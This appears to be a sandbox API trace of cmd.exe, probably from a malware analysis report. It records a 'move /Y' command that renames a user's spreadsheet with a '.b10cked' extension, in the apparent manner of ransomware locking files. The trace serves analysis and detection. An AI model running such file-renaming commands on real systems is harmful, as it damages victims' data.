OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0130.557] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.557] GetProcAddress (hModule=0x76910000, 
lpProcName="SetThreadUILanguage") returned 0x769624c2 [0130.557] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.557] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.557] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f8f4 | out: phkResult=0x16f8f4*=0x0) returned 0x2 [0130.557] VirtualQuery (in: lpAddress=0x16f92b, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.557] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.557] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.557] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.558] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f8c4, dwLength=0x1c | out: lpBuffer=0x16f8c4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.558] GetConsoleOutputCP () returned 0x1b5 [0130.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.558] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0130.558] _get_osfhandle (_FileHandle=1) returned 0x7 
[0130.558] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0130.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0130.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.558] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.558] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.558] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0130.559] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.559] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0130.559] GetEnvironmentStringsW () returned 0x3101b0* [0130.559] FreeEnvironmentStringsW (penv=0x3101b0) returned 1 [0130.559] GetEnvironmentStringsW () returned 0x3101b0* [0130.559] FreeEnvironmentStringsW (penv=0x3101b0) returned 1 [0130.559] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e864 | out: phkResult=0x16e864*=0x40) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0xe8, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, 
lpData=0x16e870*=0x0, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegCloseKey (hKey=0x40) returned 0x0 [0130.560] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e864 | out: phkResult=0x16e864*=0x40) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x40, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x1, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x0, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] 
RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x9, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x4, lpData=0x16e870*=0x9, lpcbData=0x16e868*=0x4) returned 0x0 [0130.560] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e86c, lpData=0x16e870, lpcbData=0x16e868*=0x1000 | out: lpType=0x16e86c*=0x0, lpData=0x16e870*=0x9, lpcbData=0x16e868*=0x1000) returned 0x2 [0130.560] RegCloseKey (hKey=0x40) returned 0x0 [0130.560] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886365 [0130.560] srand (_Seed=0x5b886365) [0130.560] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"" [0130.561] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked\"" [0130.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.561] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x311910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0130.561] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0130.561] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0130.561] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.561] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0130.561] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0130.561] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0130.561] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0130.561] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0130.561] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0130.561] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0130.562] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0130.562] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0130.562] GetEnvironmentStringsW () returned 0x312300* [0130.562] FreeEnvironmentStringsW (penv=0x312300) returned 1 [0130.562] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.562] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0130.562] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0130.562] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0130.562] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0130.562] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0130.562] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0130.562] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0130.562] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0130.562] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0130.562] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f630 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.562] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f630, lpFilePart=0x16f62c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f62c*="Desktop") returned 0x18 [0130.562] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.562] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f3ac | out: lpFindFileData=0x16f3ac) returned 0x310040 [0130.563] FindClose (in: hFindFile=0x310040 | out: hFindFile=0x310040) returned 1 [0130.563] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f3ac | out: lpFindFileData=0x16f3ac) returned 0x310040 [0130.563] FindClose (in: hFindFile=0x310040 | out: hFindFile=0x310040) returned 1 [0130.563] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f3ac | out: lpFindFileData=0x16f3ac) returned 0x310040 [0130.563] FindClose (in: hFindFile=0x310040 | out: hFindFile=0x310040) returned 1 [0130.563] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0130.563] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0130.563] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0130.563] GetEnvironmentStringsW () returned 0x312b20* [0130.564] FreeEnvironmentStringsW (penv=0x312b20) returned 1 [0130.564] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.564] GetConsoleOutputCP () returned 0x1b5 [0130.564] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0130.564] GetUserDefaultLCID () returned 0x409 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x16f770, cchData=128 | out: lpLCData="0") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f770, cchData=128 | out: lpLCData="0") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f770, cchData=128 | out: lpLCData="1") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0130.565] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0130.565] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.566] GetConsoleTitleW (in: lpConsoleTitle=0x300900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0130.566] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0130.566] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0130.566] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0130.567] _wcsicmp (_String1="move", _String2=")") returned 68 [0130.567] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0130.567] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0130.567] _wcsicmp (_String1="IF", _String2="move") returned -4 [0130.567] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0130.567] _wcsicmp (_String1="REM", _String2="move") returned 5 [0130.567] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0130.571] GetConsoleTitleW (in: lpConsoleTitle=0x16f468, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.571] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0130.571] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0130.571] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0130.571] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0130.571] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="CD") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0130.571] _wcsicmp (_String1="move", _String2="REN") returned -5 [0130.571] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0130.571] _wcsicmp (_String1="move", _String2="SET") returned -6 [0130.571] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0130.571] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0130.571] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0130.571] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0130.571] _wcsicmp (_String1="move", _String2="MD") returned 11 [0130.571] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0130.571] _wcsicmp (_String1="move", _String2="RD") returned -5 [0130.571] _wcsicmp (_String1="move", 
_String2="RMDIR") returned -5 [0130.571] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0130.571] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0130.571] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0130.571] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0130.571] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0130.572] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0130.572] _wcsicmp (_String1="move", _String2="VER") returned -9 [0130.572] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0130.572] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0130.572] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0130.572] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0130.572] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0130.572] _wcsicmp (_String1="move", _String2="START") returned -6 [0130.572] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0130.572] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0130.572] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0130.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0130.573] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f224, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f21c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f21c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) 
returned 3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.574] 
_wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.574] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.575] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0130.575] _wcsicmp (_String1="P939UI~1.XLS", _String2=".") returned 66 [0130.575] _wcsicmp (_String1="P939UI~1.XLS", _String2="..") returned 66 [0130.575] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui~1.xls")) returned 0x20 [0130.575] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311e88 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0130.575] SetErrorMode (uMode=0x0) returned 0x0 [0130.575] SetErrorMode (uMode=0x1) returned 0x0 [0130.575] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", nBufferLength=0x104, lpBuffer=0x16ebac, lpFilePart=0x16eb94 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", lpFilePart=0x16eb94*="P939UI~1.XLS") returned 0x2f [0130.575] SetErrorMode (uMode=0x0) returned 0x1 [0130.575] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1")) returned 0x10 [0130.576] _wcsicmp (_String1="P939UI~1.XLS", _String2=".") returned 66 [0130.576] _wcsicmp (_String1="P939UI~1.XLS", _String2="..") returned 66 [0130.576] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui~1.xls")) returned 0x20 [0130.576] 
SetErrorMode (uMode=0x0) returned 0x0 [0130.576] SetErrorMode (uMode=0x1) returned 0x0 [0130.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", nBufferLength=0x104, lpBuffer=0x16f028, lpFilePart=0x16edc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", lpFilePart=0x16edc0*="P939UI~1.XLS") returned 0x2f [0130.576] SetErrorMode (uMode=0x0) returned 0x1 [0130.576] SetErrorMode (uMode=0x0) returned 0x0 [0130.576] SetErrorMode (uMode=0x1) returned 0x0 [0130.576] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x16f230, lpFilePart=0x16edc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", lpFilePart=0x16edc0*="P939uI0IUIKwHsX.xlsx.b10cked") returned 0x3f [0130.576] SetErrorMode (uMode=0x0) returned 0x1 [0130.576] SetLastError (dwErrCode=0x0) [0130.576] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx.b10cked")) returned 0xffffffff [0130.576] GetLastError () returned 0x2 [0130.576] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x16e73c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e73c) returned 0x300ee8 [0130.576] FindNextFileW (in: hFindFile=0x300ee8, lpFindFileData=0x16e73c | out: lpFindFileData=0x16e73c) returned 0 [0130.577] GetLastError () returned 0x12 [0130.577] FindClose (in: hFindFile=0x300ee8 | out: hFindFile=0x300ee8) returned 1 [0130.578] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939UI~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x311c28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311c28) returned 0x300ee8 [0130.578] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x16e9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked", lpFilePart=0x0) returned 0x3f [0130.578] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx", nBufferLength=0x104, lpBuffer=0x16e9d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx", lpFilePart=0x0) returned 0x37 [0130.578] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx")) returned 0x20 [0130.578] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\P939uI0IUIKwHsX.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\p939ui0iuikwhsx.xlsx.b10cked"), dwFlags=0x3) returned 1 